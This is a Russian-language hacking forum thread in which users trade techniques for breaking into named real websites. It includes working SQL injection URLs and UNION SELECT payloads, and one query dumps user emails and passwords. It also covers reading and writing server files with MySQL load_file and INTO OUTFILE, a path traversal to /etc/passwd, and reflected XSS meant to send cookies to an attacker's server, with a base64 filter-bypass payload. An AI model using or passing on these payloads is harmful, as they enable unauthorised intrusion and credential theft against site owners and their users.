Для просмотра файлов при ограничении вывода можно использовать запрос вида Code: select substring(load_file('/patch/to/file/file.conf'),1,100) Где первая цифра - символ, с которого начинать вывод, вторая - количество выводимых символов Просматривать содержимое каталогов через load_file можно только, если сервер стоит на FreeBSD. В других случаях это невозможно. Выполнять какие-то ни было команды через load_file также невозможно.
Если работает лоадфайл, попробуй записать через INTO OUTFILE, если знаешь полный путь и есть куда записать (путь можно узнать, читая конфиг Апача, если найдешь).
Нашел на одном сайте уязвимость, но при вставлении ковычки он выводит код на белом фоне : т.е SELECT * FROM subgrp WHERE sts = 1 and grp = 5\' На сайте: http://autolv.com/index.php?grp_id=3' Что делать? И вот недавно наткнулся на одном сайте было что подобрал поля, но не где не выводиться инфа http://asg.lv/index.php?mlng=5&mmen_id=4+union+select+1,2,3,4,5,6,7,8,9,10,11 Почему? Заранее Спасибо
Логично же - не вставлять кавычку И в этом конкретном примере вывод получить не удастся из-за двух запросов, выполняющихся подряд: Code: SELECT * FROM grp_des WHERE type = 'mgr' and grp_id =6 and lang='lang2' Code: SELECT * FROM subgrp WHERE sts = 1 and grp = 6 Успешно можно раскрутить скулю вот тут, например: Code: http://autolv.com/index.php?item_id=52 Я думаю оно работает так: Представим 2 запроса. Причем один из них фильтруется, а второй нет. В оба запроса передается один и тот же параметр Результаты первого запроса выводятся на экран, а второго - нет. Поэтому мы можем подобрать количество полей. Но вывод получить не удастся. Хотя есть некая странность, и Code: mmen_id=4-2 работает, при условии, что Code: mmen_id=if(1,2,3) работать отказывается. Этого я объяснить не могу(
Прошу помощи http://stomjob.ru/index.php?sub=search_vacbyid В поле ID вакансии подставляем ' Получаем Error You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1 Помогите подобрать поля
Code: http://ontarioworld.ru/usercp/store/prem.php?p=javajavascriptscript:alert%28%20String.fromCharCode%28120,115,115%29%29 Может мне ктонить разяснить, что сделать здесь дальше ?
http://stomjob.ru/index.php?sub=show_vacancybyid POST: Code: vacby_id=1 union select 1,version(),3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26-- 1 Либо можно вбить Code: 1 union select 1,version(),3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26-- 1 В поле поиска вакансии При этом запросе надо посмотреть внимательно на ошибку: Code: Warning: include_once(store/javajavascriptscript:alert(String.fromCharCode(120,115,115)).php Где текст ошибки говорит сам за себя.
Code: http://ontarioworld.ru/usercp/store/prem.php?p=../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././ Мб подумать чуть-чуть? Ты второй похожий инлкюд за 3 дня выкладываешь, впредь тебе никто не будет крутить их,ибо самому думать надо!!!111 И зачем ты туда алерт впихивал ?о_О Мб прочтешь уже что-нибудь, а то так и будешь задавать вопросы =/ Везде по-разном, где-то такой метод отсечения не сработует,где-то сработует. Вообще,если нулбайт не поддается экранизированию, то геморой с етим делать не надо,но этот случай как раз второй =/ Речь шла не о перемещение по каталогам ../ а про отброс расширения,т.к. там нулбайт поддается экранизированию, кароче если не понимаешь о чем вопрос,не надо пытаться ответить, темболее что я выше уже ответил.
Добрый вечер. Вот такая трабла, в пасивном XSS фильтрируется ">" Вот код, показывает куки: id=348532&returnto=><img src="themes/Industrial/images/donor_4.png" onload="javascript:alert(document.cookie)" Код работает потому-что там 1 знак ">" уже есть. А как отправить куки на моем сервере? <script src=http://hack.me/script.js></script> не пашет, так как используется ">" дважды
в каждом отдельном случае надо смотреть как обойти фильтр, как правило надо смотреть обрезается только > или полностью код, панацеи тут нет как вариант помогает закодировать строку ну например строку <script>alert(document.cookie)</script> полностью заменяет такой код data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ+ как видиш в нем не содержиться символа > вобщем нельзя что то советовать , не видя конкретного сайта с уязвимостью
Да, конечно спасибо за то что искать направили. Поискал ещё часок. Никакого софта не нашел. Проблема вот в чем: Делаю ручками LIMIT 0,1-- LIMIT 1,1-- LIMIT 2,1-- А это не совсем оптимально. Не удобно работать и времени много забирает. Есть спец. софт который сам переберет базу и выведет все строки в удобном визуальном формате? Нашел что то подобное. sql helper а ссылки все битые.
может кто знает про это я ниче норм не нашел Drupal Droptor Module SQL Injection Vulnerability http://secunia.com/advisories/43179
Я не просто отправил в поиск, а еще и дал ссылку на топик https://forum.antichat.ru/showthread.php?t=240692 Как вариант, пробуй rsaUnDumper[sql] – универсальный дампер SQL INJECTION.
rsaundumper хорошо работает многопоточно, но там не поддерживается(может пока) запросы через POST инъекций А если GETом то вот таких уж точно не признает 555555' UNION ALL SELECT 1,2,(SELECT concat(0x7e,0x27,unhex(Hex(cast(user.EMAIL as char))),0x5e,unhex(Hex(cast(user.PASSWORD as char))),0x27,0x7e) FROM `db`.user LIMIT 10000,1) -- a